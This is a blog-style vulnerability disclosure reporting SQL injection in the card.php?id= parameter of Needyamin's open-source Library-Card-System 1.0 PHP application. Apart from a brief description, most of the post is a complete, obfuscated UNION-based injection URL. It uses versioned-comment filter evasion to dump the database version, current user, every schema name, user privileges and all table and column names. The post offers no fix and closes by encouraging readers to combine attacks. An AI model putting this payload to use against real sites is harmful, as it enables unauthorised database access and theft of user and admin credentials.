Header Ads Widget

Needyamin | Library-Card-System 1.0 | card.php?id= SQL Injection | Found By Maloy Roy Orko

February 06, 2025

Hi All, 


I am Maloy Roy Orko.
Recently in one of my pentest research, I found an Library-Card-System By Needyamin which is an open source E-commerce application using native PHP.


Curious to explore its functionalities, I downloaded and set it up in my local system. 

After fiddling with the source code, I found that it did not have any kind of SQL Injection protection.

It can lead into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.


The Main Thing Is,if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too.Thats why I am trying to inform everyone about this.

  • Title of the Vulnerability:                    Needyamin | Library-Card-System 1.0 | card.php?id= SQL Injection | Found By Maloy Roy Orko 
  • Vulnerability Class:                                  SQL Injection
  • Product Name: Library-Card-System 
  • Vendor: https://github.com/needyamin/
  • Vulnerable Product Link: https://github.com/needyamin/Library-Card-System/
  • Technical Details & Description: The application source code is coded in a way which allows SQL Injection. This leads into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.

  • Product & Service Introduction: Library-Card-System
Observation & Exploitation: 

  1. Let's see the source code?       


  2. You can see that there is no defense or filter against SQL Injection.Normally They are getting IDS and then fetching data From Database According to it.
  3. So Lets See ,How I exploited It? What is the exploitable parameter here?
  4. That is:      card.php?id=
  5. Lets Take a example and then see the exploit use here!
  6. Vulnerable Place :
  7. http://192.168.0.100:8080/libb/card.php?id=40+exploit
  8. So,Lets see an approach and the result?




  10. My Exploit For This Information Discolsure:
  11. http://192.168.0.100:8080/libb/card.php?id=40'AND+0+UNION+SELECT+1,2,3,4,5,6,/*!50000cOncat/**Darknet-Haxor**/*/(0x223e273e3c2f7469746c653e,0x3c703e3c62723e3c6120687265663d2223223e3c696d67207469746c653d224841584f5222207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d756939795f376b6a5a51512f5836356f51356d4d5a34492f41414141414141414144412f45374e7a42316e686270516e314a316d4e474f58335a783857744a537250354177434c63424741735948512f733332302f32303230313131335f3137303032382e706e6722206865696768743d22313530222077696474683d22313530222f3e3c2f613e3c2f703e3c62723e3c666f6e7420636f6c6f723d22726564223e3c623e496e6a656374656420627920,0x4d616c6f7920526f79204f726b6f,0x3c2f623e3c2f666f6e743e3c62723e3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**Darknet-Haxor**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**Darknet-Haxor**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**Darknet-Haxor**/*/(),0x3c62723e,0x3c62723e,0x544f54414c2044415441424153453a3a20,0x3c62723e,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**Darknet-Haxor**/*/(@w:=0x00) ,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000InFOrMATIoN_SChEmA/**Darknet-Haxor**/*/.SCheMaTA)/*!50000WhErE/**Darknet-Haxor**/*/(@w)IN(@w:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@w,0x3c666f6e7420636f6c6f723d22726564223e2d2d2d2d2d2d3e203c2f666f6e743e,/*!50000sCheMa_NaMe/**Darknet-Haxor**/*/,0x3c62723e))))w),0x3c62723e,0x3c62723e,0x555345522050524956494c4547453a3a20,0x3c62723e,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**Darknet-Haxor**/*/(@z:=0x00) ,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000INFOrmATiON_SChEmA/**Darknet-Haxor**/*/.UsER_PRIViLEgES)/*!50000WhERE/**Darknet-Haxor**/*/(@z)IN(@z:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@z,0x3c666f6e7420636f6c6f723d22726564223e2d2d2d2d2d2d3e203c2f666f6e743e,GrANtEE,0x202d3e20,Is_gRANTaBLE,0x3c62723e))))z),0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x3c666f6e7420636f6c6f723d22696e6469676f223e3c2d2d2d204441524b4e4554202d204841584f52202d2d2d3e3c2f666f6e743e3c62723e,(selEct(@x)/*!50000fRom/**Darknet-Haxor**/*/(/*!50000sElect/**Darknet-Haxor**/*/(@x:=0x00),(sElect(0)/*!From/**Darknet-Haxor**/*/(/*!50000inforMation_schEma.coLuMns/**Darknet-Haxor**/*/)/*!50000Where/**Darknet-Haxor**/*/(taBle_schema=/*!50000DatAbase/**Darknet-Haxor*/*/())and(0x00)in(@x:=/*!50000coNcat/**Darknet-Haxor**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**Darknet-Haxor**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**Darknet-Haxor**/*/))))x)),8,9,10,11,12,13--+



Guess What ?

It is clearly a SQL Injection Vulnerability 

Conclusion :- 

The main aim of this article is to show that if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too. But I also hope that it helps to give you ideas of how combining attacks can make them much more potent.